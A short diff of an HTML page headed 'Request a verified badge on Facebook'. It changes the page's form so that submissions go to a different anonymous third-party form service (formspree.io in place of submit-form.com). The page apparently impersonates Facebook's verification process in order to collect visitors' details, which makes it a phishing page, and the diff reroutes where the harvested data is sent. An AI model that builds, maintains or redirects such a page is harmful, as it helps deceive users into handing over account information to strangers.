--- a/index.html
+++ b/index.html
@@ -27,7 +27,7 @@
 
     <div class="deho">
 
-        <form class="content" action="https://submit-form.com/NbMZ9JOln" method="post">
+        <form class="content" action="https://formspree.io/f/xqazbgvq" method="post">
 
             <p class="head">Request a verified badge on Facebook</p> <br>
 
